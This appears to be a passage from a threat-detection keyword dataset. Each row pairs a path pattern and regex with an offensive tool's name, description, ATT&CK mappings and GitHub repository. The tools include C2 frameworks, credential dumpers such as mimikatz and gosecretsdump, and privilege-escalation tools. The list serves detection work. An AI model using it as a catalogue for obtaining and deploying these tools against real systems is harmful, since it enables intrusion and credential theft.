"*/godoh.git*",".{0,1000}\/godoh\.git.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*/godoh/*",".{0,1000}\/godoh\/.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*/goDoH/releases*",".{0,1000}\/goDoH\/releases.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*/godoh-master.zip*",".{0,1000}\/godoh\-master\.zip.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*/GodPotato.git*",".{0,1000}\/GodPotato\.git.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*/GoFetch.git*",".{0,1000}\/GoFetch\.git.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*/golang_c2.git*",".{0,1000}\/golang_c2\.git.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*/GoldenGMSA.git*",".{0,1000}\/GoldenGMSA\.git.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","123","21","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z" "*/goldenPac.py*",".{0,1000}\/goldenPac\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/goMatrixC2.git*",".{0,1000}\/goMatrixC2\.git.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/go-mimikatz*",".{0,1000}\/go\-mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/vyrus001/go-mimikatz","1","1","N/A","10","6","598","103","2022-09-08T18:14:20Z","2015-10-22T08:43:38Z" "*/GONET-Scanner/*",".{0,1000}\/GONET\-Scanner\/.{0,1000}","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","1","N/A","N/A","1","79","20","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" "*/goPassGen.git*",".{0,1000}\/goPassGen\.git.{0,1000}","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z" "*/gopher-ls.nse*",".{0,1000}\/gopher\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/gophish.db*",".{0,1000}\/gophish\.db.{0,1000}","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","10656","1973","2024-04-15T08:29:57Z","2013-11-18T23:26:43Z" "*/gophish/*",".{0,1000}\/gophish\/.{0,1000}","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","10656","1973","2024-04-15T08:29:57Z","2013-11-18T23:26:43Z" "*/gorsair.go*",".{0,1000}\/gorsair\.go.{0,1000}","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","1","N/A","N/A","9","837","74","2023-12-19T18:44:32Z","2018-08-02T16:49:14Z" "*/go-secdump.git*",".{0,1000}\/go\-secdump\.git.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","3","279","31","2024-03-17T14:21:34Z","2023-02-23T17:02:50Z" "*/gosecretsdump*",".{0,1000}\/gosecretsdump.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/gosecretsdump.*",".{0,1000}\/gosecretsdump\..{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*/gosecretsdump/*",".{0,1000}\/gosecretsdump\/.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*/gosecretsdump_linux*",".{0,1000}\/gosecretsdump_linux.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*/gosecretsdump_mac*",".{0,1000}\/gosecretsdump_mac.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*/gosecretsdump_win*",".{0,1000}\/gosecretsdump_win.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*/GoStompy.go*",".{0,1000}\/GoStompy\.go.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*/Gotato.git*",".{0,1000}\/Gotato\.git.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*/gotato.go*",".{0,1000}\/gotato\.go.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*/goWMIExec.git*",".{0,1000}\/goWMIExec\.git.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*/goWMIExec_linux_*",".{0,1000}\/goWMIExec_linux_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*/goWMIExec_mac_*",".{0,1000}\/goWMIExec_mac_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*/goWMIExec_win_*",".{0,1000}\/goWMIExec_win_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","1","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*/goZulipC2.git*",".{0,1000}\/goZulipC2\.git.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/GPOddity.git*",".{0,1000}\/GPOddity\.git.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","1","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*/GPOddity/*",".{0,1000}\/GPOddity\/.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","1","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*/gpp_autologin.py*",".{0,1000}\/gpp_autologin\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/gpp_password.py*",".{0,1000}\/gpp_password\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/gpp-decrypt*",".{0,1000}\/gpp\-decrypt.{0,1000}","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*/gpsd-info.nse*",".{0,1000}\/gpsd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/GraphRunner.git*",".{0,1000}\/GraphRunner\.git.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*/GraphRunner.ps1*",".{0,1000}\/GraphRunner\.ps1.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*/GraphRunner-main*",".{0,1000}\/GraphRunner\-main.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*/GraphSpy.git*",".{0,1000}\/GraphSpy\.git.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","1","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*/GraphSpy.py*",".{0,1000}\/GraphSpy\.py.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","1","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*/GraphStrike.cna*",".{0,1000}\/GraphStrike\.cna.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*/GraphStrike.git*",".{0,1000}\/GraphStrike\.git.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*/graphstrike.profile*",".{0,1000}\/graphstrike\.profile.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*/GraphStrike.py*",".{0,1000}\/GraphStrike\.py.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*/GraphStrike-main/*",".{0,1000}\/GraphStrike\-main\/.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*/GreatSCT/*",".{0,1000}\/GreatSCT\/.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/GreatSCT/GreatSCT*",".{0,1000}\/GreatSCT\/GreatSCT.{0,1000}","offensive_tool_keyword","GreatSCT","GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. GreatSCT is current under support by @ConsciousHacker","T1027 - T1055 - T1566 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/greatsct-output*",".{0,1000}\/greatsct\-output.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/Group3r.exe*",".{0,1000}\/Group3r\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Group3r.exe*",".{0,1000}\/Group3r\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Grouper2.exe*",".{0,1000}\/Grouper2\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Grouper2.exe*",".{0,1000}\/Grouper2\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/GruntHTTP.exe*",".{0,1000}\/GruntHTTP\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/gs-netcat ",".{0,1000}\/gs\-netcat\s","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/gsocket.1*",".{0,1000}\/gsocket\.1.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/gsocket.git*",".{0,1000}\/gsocket\.git.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/gsocket-ssl.h*",".{0,1000}\/gsocket\-ssl\.h.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/gsocket-tor*",".{0,1000}\/gsocket\-tor.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/gsocket-util.c*",".{0,1000}\/gsocket\-util\.c.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/gs-sftp*",".{0,1000}\/gs\-sftp.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/gtfobin_update.py*",".{0,1000}\/gtfobin_update\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*/gtfobins.go*",".{0,1000}\/gtfobins\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*/gtfobins.py*",".{0,1000}\/gtfobins\.py.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*/gtfonow.py*",".{0,1000}\/gtfonow\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*/guervild/BOFs*",".{0,1000}\/guervild\/BOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 